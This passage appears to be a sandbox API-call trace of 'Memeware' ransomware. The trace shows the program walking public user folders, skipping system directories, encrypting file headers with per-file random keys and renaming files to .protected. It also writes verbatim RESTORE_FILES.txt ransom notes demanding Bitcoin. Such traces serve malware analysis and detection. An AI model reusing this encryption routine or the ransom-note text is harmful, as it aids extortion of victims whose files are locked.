(lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.727] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".rar") returned 0x0 [0095.727] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0095.727] StrStrW (lpFirst="Sleep Away.mp3", lpSrch=".zip") returned 0x0 [0095.727] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.736] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.736] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.736] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.736] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.759] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.759] CloseHandle (hObject=0xd4) returned 1 [0095.759] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.protected") returned 63 [0095.759] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), 
lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.protected" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.protected")) returned 1 [0095.760] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0095.760] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0095.760] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES.txt") returned 56 [0095.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\music\\sample music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.761] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.761] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0095.761] lstrlenA (lpString="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") returned 684 [0095.761] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0095.761] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.761] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.761] CloseHandle (hObject=0xb4) returned 1 [0095.762] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.762] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.762] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Music\\RESTORE_FILES.txt") returned 43 [0095.762] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\music\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.763] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.763] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.763] lstrlenA (lpString="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") returned 684 [0095.763] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.763] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.763] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.763] CloseHandle (hObject=0xa4) returned 1 [0095.764] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="Windows") returned -1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="Program Files") returned -1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="Program Files (x86)") returned -1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="$Recycle.bin") returned 1 [0095.764] lstrcmpiW (lpString1="Pictures", lpString2="System Volume Information") returned -1 [0095.764] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures") returned 28 [0095.764] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0095.764] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0095.764] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\*") returned 30 [0095.764] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.764] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.764] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.764] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.764] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.764] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.764] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\.") returned 30 [0095.764] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.764] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.764] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.764] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.764] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.764] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\." (normalized: "c:\\users\\public\\pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.764] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.764] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.764] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.764] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.764] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\..") returned 31 [0095.764] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.764] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.764] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.764] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.764] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.765] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\.." 
(normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.765] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.765] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.765] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.765] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.765] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.765] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.765] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.765] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.765] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrW (lpFirst="desktop.ini", 
lpSrch=".rar") returned 0x0 [0095.765] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini") returned 40 [0095.765] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.765] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.766] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.766] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0095.766] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.766] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.766] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.766] CloseHandle (hObject=0xb4) returned 1 [0095.766] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.protected") returned 50 [0095.766] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\desktop.ini.protected" (normalized: "c:\\users\\public\\pictures\\desktop.ini.protected")) returned 1 [0095.767] FindNextFileW (in: hFindFile=0x47b990, 
lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="Windows") returned -1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="Program Files") returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="Program Files (x86)") returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="$Recycle.bin") returned 1 [0095.767] lstrcmpiW (lpString1="Sample Pictures", lpString2="System Volume Information") returned -1 [0095.767] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures") returned 44 [0095.767] lstrcmpW (lpString1="Sample Pictures", lpString2=".") returned 1 [0095.767] lstrcmpW (lpString1="Sample Pictures", lpString2="..") returned 1 [0095.767] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*") returned 46 [0095.767] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0095.776] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.776] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.776] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.776] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.776] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.776] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\.") returned 46 [0095.776] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.776] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.776] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.776] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, 
pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\." (normalized: "c:\\users\\public\\pictures\\sample pictures\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.777] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.777] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.777] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.777] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.777] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.777] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.777] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\..") returned 47 [0095.777] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.777] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.777] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.777] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.777] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.777] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.777] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\.." 
(normalized: "c:\\users\\public\\pictures"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.777] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="Windows") returned -1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="Program Files") returned -1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="Program Files (x86)") returned -1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="$Recycle.bin") returned 1 [0095.777] lstrcmpiW (lpString1="Chrysanthemum.jpg", lpString2="System Volume Information") returned -1 [0095.777] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.777] StrStrIW (lpFirst="Chrysanthemum.jpg", lpSrch=".protected") returned 0x0 [0095.778] lstrcmpW (lpString1="Chrysanthemum.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.778] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.778] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.778] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.779] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.779] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".txt") 
returned 0x0 [0095.779] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.779] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".rar") returned 0x0 [0095.779] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg") returned 62 [0095.779] StrStrW (lpFirst="Chrysanthemum.jpg", lpSrch=".zip") returned 0x0 [0095.779] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.780] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.780] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0095.780] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.781] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0095.812] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0095.812] CloseHandle (hObject=0xd4) returned 1 [0095.813] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.protected") returned 72 [0095.813] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg" 
(normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Chrysanthemum.jpg.protected" (normalized: "c:\\users\\public\\pictures\\sample pictures\\chrysanthemum.jpg.protected")) returned 1 [0095.814] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="Windows") returned -1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="Program Files") returned -1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="Program Files (x86)") returned -1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="$Recycle.bin") returned 1 [0095.814] lstrcmpiW (lpString1="Desert.jpg", lpString2="System Volume Information") returned -1 [0095.814] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.814] StrStrIW (lpFirst="Desert.jpg", lpSrch=".protected") returned 0x0 [0095.814] lstrcmpW (lpString1="Desert.jpg", lpString2="RESTORE_FILES.txt") returned -1 [0095.814] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0095.814] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0095.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0095.815] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0095.815] StrStrW (lpFirst="Desert.jpg", lpSrch=".txt") returned 0x0 
